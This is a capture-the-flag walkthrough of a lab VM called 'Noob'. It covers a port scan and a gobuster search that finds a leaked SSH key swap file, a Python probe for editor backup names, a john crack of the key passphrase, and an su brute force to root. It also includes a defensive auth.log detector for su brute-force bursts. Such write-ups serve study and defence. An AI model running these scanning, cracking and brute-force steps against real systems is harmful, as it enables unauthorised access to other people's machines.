# Lab setup
Download: Noob
NAT, IP: 192.168.1.135
# Penetration process
# Initial information gathering
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
```
nikto found notes.txt. I opened it and read the hint; it is probably a leaked editor swap file, so let's scan for one.
```
Fuck!
configuring SSH, I closed the editor by mistake and lost the key.. I can't find it
Diego
```
Scan for swap files:
```bash
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.135/' -x bak,backup,tmp,save,swp -t 100
```
Found id_rsa.swp.
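Two things worth keeping in mind at this step. First, `-x swp` only tries `name.swp`, but vim itself names the swap file of `id_rsa` as `.id_rsa.swp` (leading dot), keeps backups as `id_rsa~`, and emacs leaves `#id_rsa#` and `.#id_rsa`; a web root can hold any of these. Second, a vim swap file is not the key itself but a buffer dump whose first bytes are the magic `b0VIM`; the key text inside it can be pulled out with `vim -r id_rsa.swp` (then `:w` to a new file) or, in a pinch, `strings`. The following helper is an added example, not code from the original writeup: it builds the full candidate set for a given filename, checks for the vim magic, and probes a web root with the standard library. The base URL and filename are the ones used above and are only assumptions for the demo.

```python
"""Added example (not from the original writeup): enumerate the names an editor
or admin leaves behind for a file, then probe a web root for them.
Assumptions: base URL and filename are hypothetical; the probe only reports
HTTP 200 responses and does not parse the bodies."""
import sys
import urllib.error
import urllib.parse
import urllib.request

# Generic suffixes: the gobuster -x list from above plus two common ones.
GENERIC_EXTENSIONS = ("bak", "backup", "tmp", "save", "swp", "old", "orig")


def backup_candidates(name):
    """Candidate leaked-file names for `name`, editor conventions included."""
    cands = [f"{name}.{ext}" for ext in GENERIC_EXTENSIONS]   # gobuster -x style
    # vim: swap files are .name.swp (.swo/.swn if several), backups are name~
    cands += [f".{name}.swp", f".{name}.swo", f".{name}.swn", f"{name}~"]
    # emacs: auto-save file #name#, lock file .#name
    cands += [f"#{name}#", f".#{name}"]
    seen, out = set(), []
    for c in cands:                       # drop duplicates, keep order
        if c not in seen:
            seen.add(c)
            out.append(c)
    return out


def is_vim_swap(data):
    """True if `data` starts with vim's swap-file block-0 magic 'b0VIM'."""
    return data[:5] == b"b0VIM"


def probe(base_url, name, timeout=5):
    """GET each candidate under base_url; return the URLs that answer 200."""
    found = []
    for cand in backup_candidates(name):
        url = base_url.rstrip("/") + "/" + urllib.parse.quote(cand)
        req = urllib.request.Request(url, headers={"User-Agent": "swap-probe"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                if resp.status == 200:
                    found.append(url)
        except (urllib.error.HTTPError, urllib.error.URLError):
            continue
    return found


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.135/"
    for hit in probe(base, "id_rsa"):
        print(hit)
```

Run it as `python3 swap_probe.py http://192.168.1.135/`. On this box the hit is `id_rsa.swp` without the leading dot, so the file was evidently renamed or copied by hand; on a real target the dotted vim form is the one a plain `-x` scan misses.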
Pulled it down and tried to log in with it; the key asks for a passphrase, so crack it with john.
```bash
┌──(root㉿kali)-[~]
└─# ssh2john id_rsa > id_rsa.hash
┌──(root㉿kali)-[~]
└─# john --format=SSH id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
```
That gives the passphrase sandiego, and the earlier notes.txt told us the username is diego.
Logged in and got a shell.
# Privilege escalation
Speechless. I couldn't find anything at all. Read a walkthrough: brute-force su?
Damn it, brute force! Technical content = 0.
Open-source brute-force project: suForce
It cracked the password: rootbeer
Got a root shell.
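The brute force only works because nothing on the box throttles or locks repeated su failures (pam_faillock would stop it), but every attempt is still written to auth.log, so from the defender's side this step is the noisiest one in the whole chain. The detector below is an added example, not part of the original writeup or of suForce: it parses constructed auth.log lines in the two common failed-su formats (util-linux su, which Debian 11 uses, logs `FAILED SU (to root) diego on pts/0`; shadow's su logs `FAILED su for root by diego`) and raises one alert per user/target pair whose densest window holds at least `threshold` failures. The sample log, threshold and window are assumptions for the demo.

```python
"""Added example (not from the original writeup or from suForce): flag su
brute-force bursts in auth.log. The log lines below are constructed for the
example; the message formats are util-linux su (Debian 11) and shadow su."""
import re
from collections import defaultdict
from datetime import datetime

TS_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) ")
# util-linux su:  "su[901]: FAILED SU (to root) diego on pts/0"
UTIL_LINUX_RE = re.compile(
    r"su(?:\[\d+\])?: FAILED SU \(to (?P<target>\S+)\) (?P<user>\S+) on ")
# shadow su:      "su[901]: FAILED su for root by diego"
SHADOW_RE = re.compile(
    r"su(?:\[\d+\])?: FAILED su for (?P<target>\S+) by (?P<user>\S+)")

# Constructed sample: six failures in three seconds, one success, one stray failure.
SAMPLE_LOG = """\
Jun 5 21:14:01 noob sshd[812]: Accepted publickey for diego from 192.168.1.10 port 50122 ssh2
Jun 5 21:14:10 noob su[901]: FAILED SU (to root) diego on pts/0
Jun 5 21:14:10 noob su[902]: FAILED SU (to root) diego on pts/0
Jun 5 21:14:11 noob su[903]: FAILED SU (to root) diego on pts/0
Jun 5 21:14:11 noob su[904]: FAILED SU (to root) diego on pts/0
Jun 5 21:14:12 noob su[905]: FAILED SU (to root) diego on pts/0
Jun 5 21:14:12 noob su[906]: FAILED SU (to root) diego on pts/0
Jun 5 21:14:13 noob su[907]: (to root) diego on pts/0
Jun 5 21:30:00 noob su[950]: FAILED SU (to root) alice on pts/1
"""


def parse_failure(line, year=2024):
    """Return {'ts','user','target'} for a failed-su line, else None.
    Syslog timestamps carry no year, so the caller supplies one."""
    m = TS_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    for rx in (UTIL_LINUX_RE, SHADOW_RE):
        mm = rx.search(line)
        if mm:
            return {"ts": ts, "user": mm.group("user"), "target": mm.group("target")}
    return None


def detect_su_bruteforce(lines, threshold=5, window_seconds=60):
    """One alert per (user, target) whose densest window holds >= threshold failures."""
    stamps_by_pair = defaultdict(list)
    for line in lines:
        ev = parse_failure(line)
        if ev:
            stamps_by_pair[(ev["user"], ev["target"])].append(ev["ts"])
    alerts = []
    for (user, target), stamps in stamps_by_pair.items():
        stamps.sort()
        best, span, start = 0, None, 0
        for end, t in enumerate(stamps):          # sliding window over sorted times
            while (t - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > best:
                best, span = end - start + 1, (stamps[start], t)
        if best >= threshold:
            alerts.append({"user": user, "target": target, "count": best,
                           "first": span[0], "last": span[1]})
    return alerts


if __name__ == "__main__":
    for a in detect_su_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{a['user']} -> {a['target']}: {a['count']} failures "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

A successful su after such a burst (the `(to root) diego on pts/0` line with no `FAILED`) is the follow-up to correlate on; the single failure by alice stays below the threshold and is ignored.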
# Summary
I need to build up wordlists. Labs like this are mostly made by foreigners; in real engagements you may need to assemble wordlists that fit the target.